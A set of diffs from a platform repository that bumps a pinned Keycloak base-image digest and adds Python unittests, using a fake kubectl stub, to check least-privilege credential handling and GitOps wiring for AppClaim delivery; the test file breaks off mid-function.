 FROM ${UPSTREAM_IMAGE}:${UPSTREAM_TAG}@${UPSTREAM_DIGEST} AS builder
@@ -41,7 +41,7 @@ COPY --from=builder /opt/keycloak/ /opt/keycloak/
 
 # Provenance (baked as OCI labels). base_digest records the immutable source.
 ARG version=26.7.0
-ARG base_digest=sha256:2eb3cd316835c990e69e26ade292ffa78f6fb0db7d5fc6377463c162e1979ac0
+ARG base_digest=sha256:0f198be292568439d700cdbfb893e69a6009bb43a94a06a945b1d3d506c76b13
 LABEL org.opencontainers.image.title="digiorg/keycloak" \
       org.opencontainers.image.description="DigiOrg production-optimized Keycloak (kc.sh build --optimized)" \
       org.opencontainers.image.source="https://github.com/digiorg/core" \

--- a/platform/images/keycloak/README.md
+++ b/platform/images/keycloak/README.md
@@ -41,7 +41,7 @@ avoids shipping credentials in a layer.
 | Local (kind) image | `digiorg/keycloak:26.7.0-optimized` |
 | Registry path (Harbor) | `digiorg.local/library/keycloak:26.7.0-optimized` |
 | Upstream base | `quay.io/keycloak/keycloak:26.7.0` |
-| Upstream base digest (immutable) | `sha256:2eb3cd316835c990e69e26ade292ffa78f6fb0db7d5fc6377463c162e1979ac0` |
+| Upstream base digest (immutable) | `sha256:0f198be292568439d700cdbfb893e69a6009bb43a94a06a945b1d3d506c76b13` |
 | Build-time options | `KC_DB=postgres`, `KC_HEALTH_ENABLED=true`, `KC_METRICS_ENABLED=true` |
 
 The local image + `IfNotPresent` pull policy are consumed by

--- a/platform/images/keycloak/build.nu
+++ b/platform/images/keycloak/build.nu
@@ -34,7 +34,7 @@
 # --- Pinned upstream base --------------------------------------------------- #
 const UPSTREAM_IMAGE = "quay.io/keycloak/keycloak"
 const UPSTREAM_TAG = "26.7.0"
-const UPSTREAM_DIGEST = "sha256:2eb3cd316835c990e69e26ade292ffa78f6fb0db7d5fc6377463c162e1979ac0"
+const UPSTREAM_DIGEST = "sha256:0f198be292568439d700cdbfb893e69a6009bb43a94a06a945b1d3d506c76b13"
 
 # --- Image coordinates ------------------------------------------------------ #
 # IMAGE/TAG are the local (kind-loaded) coordinates and MUST match the image

--- a/platform/tests/test_appclaim_delivery.py
+++ b/platform/tests/test_appclaim_delivery.py
@@ -152,16 +152,27 @@ class SecretTransportTest(unittest.TestCase):
                 "    if scenario == 'readback_failure': sys.exit(1)\n"
                 "    if any('metadata.annotations' in arg for arg in args): print('', end=''); sys.exit(0)\n"
                 "    obj = json.load(open(path, encoding='utf-8'))\n"
-                "    key = next(k for k in obj['data'] if any(k in arg for arg in args))\n"
-                "    value = obj['data'][key]\n"
-                "    print('d3Jvbmc=' if scenario == 'readback_mismatch' else value, end='')\n"
+                "    output = args[args.index('-o') + 1]\n"
+                "    if output == 'json':\n"
+                "        if scenario == 'readback_mismatch': obj['data'] = {k: 'd3Jvbmc=' for k in obj['data']}\n"
+                "        print(json.dumps(obj), end='')\n"
+                "    elif output.startswith('jsonpath={.'):\n"
+                "        value = obj\n"
+                "        for part in output[len('jsonpath={.'):-1].split('.'):\n"
+                "            if not isinstance(value, dict) or part not in value:\n"
+                "                value = ''\n"
+                "                break\n"
+                "            value = value[part]\n"
+                "        print('d3Jvbmc=' if scenario == 'readback_mismatch' else value, end='')\n"
+                "    else:\n"
+                "        sys.exit(2)\n"
                 "else:\n"
                 "    sys.exit(2)\n"
             )
         os.chmod(fake, 0o755)
         return fake
 
-    def _run_opaque_secret_transport(self, scenario, initial=None):
+    def _run_opaque_secret_transport(self, scenario, initial=None, key="token"):
         sentinel = "sentinel-opaque-secret-value-never-in-argv"
         with tempfile.TemporaryDirectory() as tmp:
             self._fake_kubectl_single_key(tmp, scenario)
@@ -178,7 +189,7 @@ class SecretTransportTest(unittest.TestCase):
             env["TEST_VALUE"] = sentinel
             result = subprocess.run(
                 ["nu", "-c", f"source {SETUP}; persist_opaque_secret crossplane-system "
-                              f"crossplane-gitea-credentials token $env.TEST_VALUE"],
+                              f"crossplane-gitea-credentials {key} $env.TEST_VALUE"],
                 capture_output=True, text=True, env=env, timeout=15,
             )
             argv = _read(argv_log) if os.path.exists(argv_log) else ""
@@ -198,6 +209,25 @@ class SecretTransportTest(unittest.TestCase):
         self.assertEqual(manifest["metadata"]["namespace"], "crossplane-system")
         import base64 as b64
         self.assertEqual(b64.b64decode(manifest["data"]["token"]).decode(), sentinel)
+
+    def test_opaque_secret_dotted_key_readback_uses_literal_record_key(self):
+        result, sentinel, argv, manifest = self._run_opaque_secret_transport(
+            "success", key="seed.nk"
+        )
+        self.assertEqual(result.returncode, 0, result.stderr)
+        self.assertNotIn(sentinel, argv)
+        self.assertNotIn(sentinel, result.stdout + result.stderr)
+        assert manifest is not None
+        import base64 as b64
+        self.assertEqual(b64.b64decode(manifest["data"]["seed.nk"]).decode(), sentinel)
+        calls = [json.loads(line) for line in argv.splitlines()]
+        self.assertTrue(
+            any(
+                args[index:index + 2] == ["-o", "json"]
+                for args in calls
+                for index in range(len(args) - 1)
+            )
+        )
 
     def test_opaque_secret_per_key_ssa_preserves_unrelated_keys_and_scrubs_annotation(self):
         initial = {

--- a/platform/tests/test_appclaim_delivery.py
+++ b/platform/tests/test_appclaim_delivery.py
@@ -131,13 +131,22 @@ class SecretTransportTest(unittest.TestCase):
                 "scenario = os.environ.get('FAKE_SCENARIO', 'success')\n"
                 "path = os.environ['MANIFEST_LOG']\n"
                 "if 'get' in args and '--ignore-not-found' in args:\n"
-                "    if os.path.exists(path): print(open(path, encoding='utf-8').read(), end='')\n"
+                "    if os.path.exists(path): print('secret/x', end='')\n"
                 "elif 'apply' in args:\n"
-                "    data = sys.stdin.read()\n"
+                "    incoming = json.loads(sys.stdin.read())\n"
                 "    if scenario == 'apply_failure': sys.exit(1)\n"
-                "    open(path, 'w', encoding='utf-8').write(data)\n"
+                "    if os.path.exists(path):\n"
+                "        obj = json.load(open(path, encoding='utf-8'))\n"
+                "        obj.setdefault('data', {}).update(incoming.get('data', {}))\n"
+                "    else:\n"
+                "        obj = incoming\n"
+                "    open(path, 'w', encoding='utf-8').write(json.dumps(obj))\n"
                 "    print('secret/x configured')\n"
                 "elif 'annotate' in args:\n"
+                "    if os.path.exists(path):\n"
+                "        obj = json.load(open(path, encoding='utf-8'))\n"
+                "        obj.setdefault('metadata', {}).setdefault('annotations', {}).pop('kubectl.kubernetes.io/last-applied-configuration', None)\n"
+                "        open(path, 'w', encoding='utf-8').write(json.dumps(obj))\n"
                 "    print('secret/x annotated')\n"
                 "elif 'get' in args:\n"
                 "    if scenario == 'readback_failure': sys.exit(1)\n"
@@ -190,7 +199,7 @@ class SecretTransportTest(unittest.TestCase):
         import base64 as b64
         self.assertEqual(b64.b64decode(manifest["data"]["token"]).decode(), sentinel)
 
-    def test_opaque_secret_full_state_ssa_preserves_unrelated_keys_and_scrubs_annotation(self):
+    def test_opaque_secret_per_key_ssa_preserves_unrelated_keys_and_scrubs_annotation(self):
         initial = {
             "apiVersion": "v1", "kind": "Secret", "type": "Opaque",
             "metadata": {

--- a/platform/tests/test_appclaim_delivery.py
+++ b/platform/tests/test_appclaim_delivery.py
@@ -1,0 +1,611 @@
+#!/usr/bin/env python3
+"""AppClaim GitOps delivery + least-privilege credential lifecycle (Issue #285).
+
+The catalog side (digiorg/core-catalog) already has a real-KCL render harness
+proving the pipeline Composition's conditional/iterative behaviour and the
+provider-http mapping contract. This module locks the `core`-side half of the
+same issue that the catalog cannot prove on its own, because it depends on
+`scripts/local-setup.nu` and `apps/platform/*.yaml`:
+
+  * the two Secrets the Composition's `{{ name:namespace:key }}` placeholders
+    require (`crossplane-gitea-credentials`, `crossplane-harbor-credentials`)
+    are actually created, by a dedicated least-privilege identity -- never the
+    Gitea platform-admin bootstrap token or the Harbor admin credential;
+  * every credential-bearing value new in this issue travels only over stdin
+    into `kubectl apply -f -`, exactly like the pre-existing
+    `persist_gitea_bootstrap_token` (test_bootstrap_convergence.py already
+    locks that one);
+  * the declarative Harbor system-robot bootstrap Request only ever grants
+    `project:create` (system-wide) and `robot:create`/`robot:read`
+    (project-wildcard) -- never delete/user/registry/admin permissions;
+  * the app-config GitOps sink Application, its dedicated read-only Gitea
+    credential, and the `app-claims` namespace are wired together
+    consistently.
+
+Pure python3 + PyYAML, plus a few real-Nushell behaviour checks of the new
+pure helpers (same technique as test_bootstrap_convergence.py)::
+
+    python3 platform/tests/test_appclaim_delivery.py
+"""
+
+import json
+import os
+import re
+import subprocess
+import sys
+import tempfile
+import unittest
+
+try:
+    import yaml
+except ImportError:  # pragma: no cover - environment guard
+    sys.stderr.write("PyYAML is required: pip install pyyaml\n")
+    raise
+
+REPO_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", ".."))
+SETUP = os.path.join(REPO_ROOT, "scripts", "local-setup.nu")
+APPS_DIR = os.path.join(REPO_ROOT, "apps", "platform")
+HARBOR_REQUEST = os.path.join(REPO_ROOT, "crossplane", "bootstrap", "harbor-robot-request.yaml")
+NAMESPACES_YAML = os.path.join(REPO_ROOT, "platform", "base", "namespaces", "namespaces.yaml")
+KYVERNO_BLOCK_POLICY = os.path.join(
+    REPO_ROOT, "policies", "kyverno", "cluster-policies", "block-appclaims-in-system-namespaces.yaml"
+)
+CHECK_PINS = os.path.join(REPO_ROOT, "scripts", "check_pins.py")
+# Sibling multi-repo checkout convention (see docs/guides/local-development.md);
+# core-portal is out of scope to edit for this issue, but its already-independently-
+# tested publishPhase.git config is the authoritative contract this repo must match.
+CORE_PORTAL_APP_CONFIG = os.path.abspath(
+    os.path.join(REPO_ROOT, "..", "core-portal", "app-config.yaml")
+)
+
+
+def _read(path):
+    with open(path, encoding="utf-8") as fh:
+        return fh.read()
+
+
+def _func_body(text, name):
+    start = text.index(f"def {name} ")
+    end = text.index("\ndef ", start + 10)
+    return text[start:end]
+
+
+def _app(name):
+    with open(os.path.join(APPS_DIR, f"{name}.yaml"), encoding="utf-8") as fh:
+        doc = yaml.safe_load(fh)
+    assert doc["kind"] == "Application"
+    return doc
+
+
+def _wave(name):
+    return int(_app(name)["metadata"]["annotations"]["argocd.argoproj.io/sync-wave"])
+
+
+class SetupTextFixture(unittest.TestCase):
+    @classmethod
+    def setUpClass(cls):
+        cls.text = _read(SETUP)
+
+
+class NewFunctionsExistTest(SetupTextFixture):
+    """Every new helper/wiring point this issue introduces is present exactly once."""
+
+    def test_new_functions_are_defined(self):
+        for name in (
+            "persist_opaque_secret",
+            "persist_argocd_repo_secret",
+            "configure_app_config_repo",
+            "configure_crossplane_gitea_credentials",
+            "configure_argocd_gitea_access",
+        ):
+            self.assertEqual(
+                self.text.count(f"def {name} ["), 1, f"{name} must be defined exactly once"
+            )
+
+    def test_configure_gitea_calls_all_three_new_phases(self):
+        body = _func_body(self.text, "configure_gitea")
+        for call in (
+            "configure_app_config_repo",
+            "configure_crossplane_gitea_credentials",
+            "configure_argocd_gitea_access",
+        ):
+            self.assertIn(call, body)
+
+
+class SecretTransportTest(unittest.TestCase):
+    """`persist_opaque_secret`/`persist_argocd_repo_secret` never put a
+    credential value in argv, and are fail-closed on apply/readback failure
+    or mismatch -- the same discipline test_bootstrap_convergence.py already
+    locks for `persist_gitea_bootstrap_token`, generalized for the new
+    multi-caller helper and the ArgoCD multi-key repository Secret shape."""
+
+    def _fake_kubectl_single_key(self, tmp, scenario):
+        fake = os.path.join(tmp, "kubectl")
+        with open(fake, "w", encoding="utf-8") as fh:
+            fh.write(
+                "#!/usr/bin/env python3\n"
+                "import json, os, sys\n"
+                "args = sys.argv[1:]\n"
+                "with open(os.environ['KUBECTL_ARGV_LOG'], 'a', encoding='utf-8') as log: "
+                "log.write(json.dumps(args) + '\\n')\n"
+                "scenario = os.environ.get('FAKE_SCENARIO', 'success')\n"
+                "if 'apply' in args:\n"
+                "    data = sys.stdin.read()\n"
+                "    if scenario == 'apply_failure': sys.exit(1)\n"
+                "    open(os.environ['MANIFEST_LOG'], 'w', encoding='utf-8').write(data)\n"
+                "    print('secret/x configured')\n"
+                "elif 'get' in args:\n"
+                "    if scenario == 'readback_failure': sys.exit(1)\n"
+                "    obj = json.load(open(os.environ['MANIFEST_LOG'], encoding='utf-8'))\n"
+                "    key = list(obj['data'].keys())[0]\n"
+                "    value = obj['data'][key]\n"
+                "    print('d3Jvbmc=' if scenario == 'readback_mismatch' else value, end='')\n"
+                "else:\n"
+                "    sys.exit(2)\n"
+            )
+        os.chmod(fake, 0o755)
+        return fake
+
+    def _run_opaque_secret_transport(self, scenario):
+        sentinel = "sentinel-opaque-secret-value-never-in-argv"
+        with tempfile.TemporaryDirectory() as tmp:
+            self._fake_kubectl_single_key(tmp, scenario)
+            argv_log = os.path.join(tmp, "kubectl-argv")
+            manifest_log = os.path.join(tmp, "manifest.json")
+            env = os.environ.copy()
+            env["PATH"] = tmp + os.pathsep + env.get("PATH", "")
+            env["KUBECTL_ARGV_LOG"] = argv_log
+            env["MANIFEST_LOG"] = manifest_log
+            env["FAKE_SCENARIO"] = scenario
+            env["TEST_VALUE"] = sentinel
+            result = subprocess.run(
+                ["nu", "-c", f"source {SETUP}; persist_opaque_secret crossplane-system "
+                              f"crossplane-gitea-credentials token $env.TEST_VALUE"],
+                capture_output=True, text=True, env=env, timeout=15,
+            )
+            argv = _read(argv_log) if os.path.exists(argv_log) else ""
+            manifest = None
+            if os.path.exists(manifest_log):
+                manifest = json.loads(_read(manifest_log))
+            return result, sentinel, argv, manifest
+
+    def test_opaque_secret_transport_is_argv_free_and_correct(self):
+        result, sentinel, argv, manifest = self._run_opaque_secret_transport("success")
+        self.assertEqual(result.returncode, 0, result.stderr)
+        self.assertNotIn(sentinel, argv)
+        self.assertNotIn(sentinel, result.stdout + result.stderr)
+        self.assertIsNotNone(manifest)
+        assert manifest is not None
+        self.assertEqual(manifest["metadata"]["name"], "crossplane-gitea-credentials")
+        self.assertEqual(manifest["metadata"]["namespace"], "crossplane-system")
+        import base64 as b64
+        self.assertEqual(b64.b64decode(manifest["data"]["token"]).decode(), sentinel)
+
+    def test_opaque_secret_apply_failure_is_fatal(self):
+        result, _, _, _ = self._run_opaque_secret_transport("apply_failure")
+        self.assertNotEqual(result.returncode, 0)
+
+    def test_opaque_secret_readback_failure_and_mismatch_are_fatal(self):
+        for scenario in ("readback_failure", "readback_mismatch"):
+            with self.subTest(scenario=scenario):
+                result, _, _, _ = self._run_opaque_secret_transport(scenario)
+                self.assertNotEqual(result.returncode, 0)
+
+    def test_opaque_secret_rejects_empty_value(self):
+        result = subprocess.run(
+            ["nu", "-c", f"source {SETUP}; persist_opaque_secret crossplane-system x y ''"],
+            capture_output=True, text=True, timeout=15,
+        )
+        self.assertNotEqual(result.returncode, 0)
+        self.assertIn("empty", result.stderr.lower())
+
+    # --- persist_argocd_repo_secret: multi-key repository Secret shape ---
+
+    def _fake_kubectl_repo_secret(self, tmp, scenario, pre_existing):
+        fake = os.path.join(tmp, "kubectl")
+        with open(fake, "w", encoding="utf-8") as fh:
+            fh.write(
+                "#!/usr/bin/env python3\n"
+                "import json, os, sys\n"
+                "args = sys.argv[1:]\n"
+                "with open(os.environ['KUBECTL_ARGV_LOG'], 'a', encoding='utf-8') as log: "
+                "log.write(json.dumps(args) + '\\n')\n"
+                "scenario = os.environ.get('FAKE_SCENARIO', 'success')\n"
+                "pre_existing = os.environ.get('PRE_EXISTING') == '1'\n"
+                "if 'get' in args and 'jsonpath={.data.password}' not in args:\n"
+                # existence probe used by the resume-preserve short-circuit
+                "    sys.exit(0 if pre_existing else 1)\n"
+                "elif 'apply' in args:\n"
+                "    data = sys.stdin.read()\n"
+                "    if scenario == 'apply_failure': sys.exit(1)\n"
+                "    open(os.environ['MANIFEST_LOG'], 'w', encoding='utf-8').write(data)\n"
+                "    print('secret/x configured')\n"
+                "elif 'get' in args:\n"
+                "    if scenario == 'readback_failure': sys.exit(1)\n"
+                "    obj = json.load(open(os.environ['MANIFEST_LOG'], encoding='utf-8'))\n"
+                "    value = obj['data']['password']\n"
+                "    print('d3Jvbmc=' if scenario == 'readback_mismatch' else value, end='')\n"
+                "else:\n"
+                "    sys.exit(2)\n"
+            )
+        os.chmod(fake, 0o755)
+        return fake
+
+    def _run_repo_secret_transport(self, scenario, pre_existing=False):
+        sentinel = "sentinel-argocd-repo-password-never-in-argv"
+        with tempfile.TemporaryDirectory() as tmp:
+            self._fake_kubectl_repo_secret(tmp, scenario, pre_existing)
+            argv_log = os.path.join(tmp, "kubectl-argv")
+            manifest_log = os.path.join(tmp, "manifest.json")
+            env = os.environ.copy()
+            env["PATH"] = tmp + os.pathsep + env.get("PATH", "")
+            env["KUBECTL_ARGV_LOG"] = argv_log
+            env["MANIFEST_LOG"] = manifest_log
+            env["FAKE_SCENARIO"] = scenario
+            env["PRE_EXISTING"] = "1" if pre_existing else "0"
+            env["TEST_VALUE"] = sentinel
+            result = subprocess.run(
+                ["nu", "-c", f"source {SETUP}; persist_argocd_repo_secret app-config-repo-creds "
+                              f"https://digiorg.local/gitea/DigiOrg/app-config.git argocd-reader $env.TEST_VALUE"],
+                capture_output=True, text=True, env=env, timeout=15,
+            )
+            argv = _read(argv_log) if os.path.exists(argv_log) else ""
+            manifest = None
+            if os.path.exists(manifest_log):
+                manifest = json.loads(_read(manifest_log))
+            return result, sentinel, argv, manifest
+
+    def test_repo_secret_has_argocd_repository_label_and_all_three_keys(self):
+        result, sentinel, argv, manifest = self._run_repo_secret_transport("success")
+        self.assertEqual(result.returncode, 0, result.stderr)
+        self.assertNotIn(sentinel, argv)
+        self.assertIsNotNone(manifest)
+        assert manifest is not None
+        self.assertEqual(
+            manifest["metadata"]["labels"]["argocd.argoproj.io/secret-type"], "repository"
+        )
+        self.assertEqual(manifest["metadata"]["namespace"], "argocd")
+        self.assertEqual(set(manifest["data"].keys()), {"url", "username", "password"})
+        import base64 as b64
+        self.assertEqual(
+            b64.b64decode(manifest["data"]["url"]).decode(),
+            "https://digiorg.local/gitea/DigiOrg/app-config.git",
+        )
+        self.assertEqual(b64.b64decode(manifest["data"]["username"]).decode(), "argocd-reader")
+
+    def test_repo_secret_is_preserved_when_already_present(self):
+        result, sentinel, argv, manifest = self._run_repo_secret_transport("success", pre_existing=True)
+        self.assertEqual(result.returncode, 0, result.stderr)
+        # No apply/readback should have run at all -- the short-circuit exits
+        # before ever touching the manifest.
+        self.assertIsNone(manifest)
+        self.assertNotIn("apply", argv)
+
+    def test_repo_secret_apply_failure_is_fatal(self):
+        result, _, _, _ = self._run_repo_secret_transport("apply_failure")
+        self.assertNotEqual(result.returncode, 0)
+
+    def test_repo_secret_readback_mismatch_is_fatal(self):
+        result, _, _, _ = self._run_repo_secret_transport("readback_mismatch")
+        self.assertNotEqual(result.returncode, 0)
+
+
+class LeastPrivilegeGiteaScopeTest(SetupTextFixture):
+    """The two new Gitea identities must never carry the broad admin scope
+    list used for the one-time platform bootstrap token."""
+
+    def test_crossplane_provisioner_token_is_write_repository_only(self):
+        body = _func_body(self.text, "configure_crossplane_gitea_credentials")
+        self.assertIn("--scopes write:repository --raw", body)
+        self.assertNotIn("write:admin", body)
+        self.assertNotIn("write:user", body)
+        self.assertNotIn("write:organization", body)
+
+    def test_argocd_reader_token_is_read_repository_only(self):
+        body = _func_body(self.text, "configure_argocd_gitea_access")
+        self.assertIn("--scopes read:repository --raw", body)
+        self.assertNotIn("write:", body)
+
+    def test_provisioner_team_is_restricted_to_repo_code_unit(self):
+        body = _func_body(self.text, "configure_crossplane_gitea_credentials")
+        self.assertIn('\\"units\\":[\\"repo.code\\"]', body)
+        self.assertIn("can_create_org_repo", body)
+
+    def test_argocd_reader_is_repo_collaborator_not_org_member(self):
+        body = _func_body(self.text, "configure_argocd_gitea_access")
+        self.assertIn("collaborators/argocd-reader", body)
+        self.assertNotIn("/teams/", body)
+
+    def test_neither_new_identity_reuses_the_bootstrap_admin_token(self):
+        for fn in ("configure_crossplane_gitea_credentials", "configure_argocd_gitea_access"):
+            body = _func_body(self.text, fn)
+            self.assertNotIn("gitea_admin_password", body)
+            self.assertNotIn("digiorgadmin", body)
+
+    def test_new_credentials_never_appear_in_argv_only_stdin(self):
+        # Same discipline as the existing org-creation/team-membership calls:
+        # the bootstrap token and generated passwords/tokens travel via a
+        # `read -r token` stdin pipe into `curl --config -`, never as a `curl
+        # -H "Authorization: ..."` CLI argument.
+        for fn in ("configure_app_config_repo", "configure_crossplane_gitea_credentials",
+                   "configure_argocd_gitea_access"):
+            body = _func_body(self.text, fn)
+            for match in re.finditer(r"curl[^\n']*", body):
+                self.assertNotIn("-H \"Authorization", match.group(0))
+
+
+class HarborBootstrapLeastPrivilegeTest(unittest.TestCase):
+    """The declarative system-robot Request must only ever be able to create
+    projects and manage robots -- never delete/read/update anything, and
+    never touch users, registries, or system configuration."""
+
+    @classmethod
+    def setUpClass(cls):
+        with open(HARBOR_REQUEST, encoding="utf-8") as fh:
+            cls.doc = yaml.safe_load(fh)
+        cls.body = json.loads(cls.doc["spec"]["forProvider"]["payload"]["body"])
+
+    def test_is_a_system_level_robot(self):
+        self.assertEqual(self.body["level"], "system")
+
+    def test_permissions_are_exactly_project_create_and_robot_create_read(self):
+        seen = set()
+        for perm in self.body["permissions"]:
+            for access in perm["access"]:
+                seen.add((perm["kind"], perm["namespace"], access["resource"], access["action"]))
+        self.assertEqual(
+            seen,
+            {
+                ("system", "/", "project", "create"),
+                ("project", "*", "robot", "create"),
+                ("project", "*", "robot", "read"),
+                ("project", "*", "artifact", "read"),
+            },
+        )
+
+    def test_no_delete_update_or_wildcard_actions(self):
+        for perm in self.body["permissions"]:
+            for access in perm["access"]:
+                self.assertNotIn(access["action"], ("delete", "update", "*"))
+
+    def test_no_user_registry_or_system_configuration_access(self):
+        forbidden_resources = {"user", "user-group", "registry", "configuration", "replication",
+                                "garbage-collection", "scanner", "ldap-user"}
+        for perm in self.body["permissions"]:
+            for access in perm["access"]:
+                self.assertNotIn(access["resource"], forbidden_resources)
+
+    def test_authorization_header_is_a_secret_placeholder_not_a_literal(self):
+        auth = self.doc["spec"]["forProvider"]["headers"]["Authorization"]
+        self.assertEqual(len(auth), 1)
+        self.assertRegex(auth[0], r"^Basic \{\{\s*[^:{}\s]+:[^:{}\s]+:[^:{}\s]+\s*\}\}$")
+        self.assertNotIn("changeme", auth[0].lower())
+
+    def test_basic_auth_secret_key_is_computed_via_base64_not_stored_plaintext_twice(self):
+        injections = self.doc["spec"]["forProvider"]["secretInjectionConfigs"]
+        self.assertEqual(len(injections), 1)
+        keys = {m["secretKey"]: m["responseJQ"] for m in injections[0]["keyMappings"]}
+        self.assertEqual(set(keys), {"name", "secret", "basicAuth"})
+        self.assertIn("@base64", keys["basicAuth"])
+        self.assertIn(".body.name", keys["basicAuth"])
+        self.assertIn(".body.secret", keys["basicAuth"])
+
+    def test_secret_injected_into_crossplane_system_namespace(self):
+        ref = self.doc["spec"]["forProvider"]["secretInjectionConfigs"][0]["secretRef"]
+        self.assertEqual(ref["name"], "crossplane-harbor-credentials")
+        self.assertEqual(ref["namespace"], "crossplane-system")
+
+    def test_deletion_policy_is_orphan_not_delete(self):
+        # A one-time bootstrap identity must not be deleted if the Application
+        # is ever removed/recreated -- that would silently invalidate every
+        # AppClaim mid-flight relying on it.
+        self.assertEqual(self.doc["spec"]["deletionPolicy"], "Orphan")
+
+    def test_payload_body_is_valid_json(self):
+        # Already loaded in setUpClass; a JSONDecodeError there would have
+        # failed the whole test class, so this documents the invariant.
+        self.assertIsInstance(self.body, dict)
+
+
+class HarborAdminBasicAuthSecretTest(SetupTextFixture):
+    """local-setup.nu must precompute base64(admin:password) once, out of
+    argv, because provider-http's `{{ name:namespace:key }}` templating
+    substitutes a secret value verbatim -- it does not encode."""
+
+    def test_harbor_admin_basic_secret_is_created_via_persist_opaque_secret(self):
+        body = _func_body(self.text, "create_platform_namespaces_secrets")
+        self.assertIn(
+            'persist_opaque_secret "harbor" "harbor-admin-basic-auth" "value"', body
+        )
+        self.assertIn("encode base64", body)
+
+    def test_basic_auth_value_is_never_passed_via_from_literal(self):
+        body = _func_body(self.text, "create_platform_namespaces_secrets")
+        self.assertNotIn("--from-literal=value=", body)
+        self.assertNotIn("--from-literal=HARBOR_ADMIN_BASIC", body)
+
+
+class AppConfigDeliveryWiringTest(unittest.TestCase):
+    """The Argo Application, its repository credential, and the app-claims
+    namespace are all consistent with each other."""
+
+    def test_app_config_repo_url_matches_the_persisted_credential_url(self):
+        app = _app("app-config")
+        repo_url = app["spec"]["source"]["repoURL"]
+        setup_text = _read(SETUP)
+        access_body = _func_body(setup_text, "configure_argocd_gitea_access")
+        self.assertIn(repo_url, access_body)
+
+    def test_app_config_destination_namespace_is_app_claims(self):
+        app = _app("app-config")
+        self.assertEqual(app["spec"]["destination"]["namespace"], "app-claims")
+
+    def test_app_config_uses_automated_sync_so_merged_prs_actually_reconcile(self):
+        app = _app("app-config")
+        self.assertIn("automated", app["spec"]["syncPolicy"])
+
+    def test_app_claims_namespace_is_declared(self):
+        namespaces = [
+            doc for doc in yaml.safe_load_all(_read(NAMESPACES_YAML)) if doc
+        ]
+        names = {ns["metadata"]["name"] for ns in namespaces}
+        self.assertIn("app-claims", names)
+
+    def test_app_claims_namespace_is_not_blocked_for_appclaims(self):
+        # If app-claims were ever added to the Kyverno block-list, the
+        # reconciliation contract above would silently reject every AppClaim.
+        policy = yaml.safe_load(_read(KYVERNO_BLOCK_POLICY))
+        blocked = policy["spec"]["rules"][0]["match"]["any"][0]["resources"]["namespaces"]
+        self.assertNotIn("app-claims", blocked)
+
+    def test_crossplane_harbor_bootstrap_syncs_after_provider_configs(self):
+        self.assertGreater(_wave("crossplane-harbor-bootstrap"), _wave("crossplane-provider-configs"))
+
+    def test_app_config_syncs_after_xrds_and_core_catalog(self):
+        self.assertGreater(_wave("app-config"), _wave("crossplane-xrds"))
+        self.assertGreater(_wave("app-config"), _wave("core-catalog"))
+
+    def test_app_config_syncs_after_the_optional_cnpg_prerequisite(self):
+        # A database-enabled AppClaim fails closed on the CNPG prerequisite
+        # (core-catalog pipeline.yaml); placing app-config after cnpg/cnpg-cluster
+        # means that, when future-infra has already been promoted, an AppClaim
+        # merged the same session never races an unresolved CNPG CRD/webhook.
+        self.assertGreater(_wave("app-config"), _wave("cnpg"))
+        self.assertGreater(_wave("app-config"), _wave("cnpg-cluster"))
+
+    def test_pinned_functions_backing_the_pipeline_are_installed(self):
+        # Issue #285 architecture decision #3: the catalog's single pipeline
+        # Composition (core-catalog/compositions/local/pipeline.yaml) needs
+        # both crossplane Functions installed here for its two-step pipeline.
+        kustom = yaml.safe_load(_read(os.path.join(REPO_ROOT, "crossplane", "providers", "packages", "kustomization.yaml")))
+        self.assertIn("function-kcl.yaml", kustom["resources"])
+        self.assertIn("function-auto-ready.yaml", kustom["resources"])
+
+
+class GitOpsPathContractTest(unittest.TestCase):
+    """The app-config Application must watch the exact directory core-portal's
+    (already independently tested) publishPhase.git.targetPath publishes
+    generated AppClaim manifests to. core-portal publishes to `claims/`; core
+    previously watched/seeded `appclaims/` -- a P0 contract mismatch that
+    would silently strand every merged AppClaim PR unreconciled."""
+
+    EXPECTED_PATH = "claims"
+
+    def test_app_config_application_watches_claims_directory(self):
+        app = _app("app-config")
+        self.assertEqual(app["spec"]["source"]["path"], self.EXPECTED_PATH)
+
+    def test_bootstrap_seeds_the_claims_directory_not_appclaims(self):
+        body = _func_body(_read(SETUP), "configure_app_config_repo")
+        self.assertIn("contents/claims/.gitkeep", body)
+        self.assertNotIn("appclaims", body)
+
+
+class GitOpsRepoURLTest(unittest.TestCase):
+    """The Argo Application source, the ArgoCD repository-credential Secret
+    URL, and the pin-policy first-party allowlist must all agree on the exact
+    same Gitea git URL for the app-config GitOps sink -- and, per the Issue
+    #285 TLS hardening pass, it must be the trusted digiorg.local ingress
+    over HTTPS (CA: cert-manager/digiorg-local-ca-secret), not a raw
+    in-cluster plain-HTTP Service address. This matches core-portal's own
+    already-tested Gitea integration (host: digiorg.local, baseUrl:
+    https://digiorg.local/gitea) and the pipeline Composition's own
+    giteaApiBase, both of which now talk to Gitea only through the trusted
+    ingress."""
+
+    EXPECTED_REPO_URL = "https://digiorg.local/gitea/DigiOrg/app-config.git"
+
+    def test_app_config_application_source_uses_the_trusted_ingress_url(self):
+        app = _app("app-config")
+        self.assertEqual(app["spec"]["source"]["repoURL"], self.EXPECTED_REPO_URL)
+
+    def test_app_config_source_is_not_the_in_cluster_service_dns_name(self):
+        app = _app("app-config")
+        self.assertNotIn("svc.cluster.local", app["spec"]["source"]["repoURL"])
+        self.assertNotIn("http://", app["spec"]["source"]["repoURL"])
+
+    def test_argocd_reader_credential_uses_the_same_url(self):
+        body = _func_body(_read(SETUP), "configure_argocd_gitea_access")
+        self.assertIn(self.EXPECTED_REPO_URL, body)
+
+    def test_check_pins_first_party_allowlist_matches_and_drops_the_old_url(self):
+        import importlib.util
+
+        spec = importlib.util.spec_from_file_location("check_pins", CHECK_PINS)
+        check_pins = importlib.util.module_from_spec(spec)
+        sys.modules["check_pins"] = check_pins
+        spec.loader.exec_module(check_pins)
+        self.assertIn(self.EXPECTED_REPO_URL, check_pins.FIRST_PARTY_REPOS)
+        self.assertNotIn(
+            "http://gitea-http.gitea.svc.cluster.local:3000/DigiOrg/app-config.git",
+            check_pins.FIRST_PARTY_REPOS,
+        )
+
+    def test_argocd_trusts_the_digiorg_local_ca_for_this_repo(self):
+        # The GitOps sink is now cloned via the digiorg.local ingress over
+        # HTTPS -- ArgoCD's repo-server must trust the same CA already
+        # registered for OIDC, via configs.tls.certificates (the argo-cd
+        # chart's argocd-tls-certs-cm mechanism), keyed by the exact
+        # hostname the repo URL uses.
+        body = _func_body(_read(SETUP), "patch_argocd_oidc_ca")
+        compact = body.replace(" ", "").replace("\n", "")
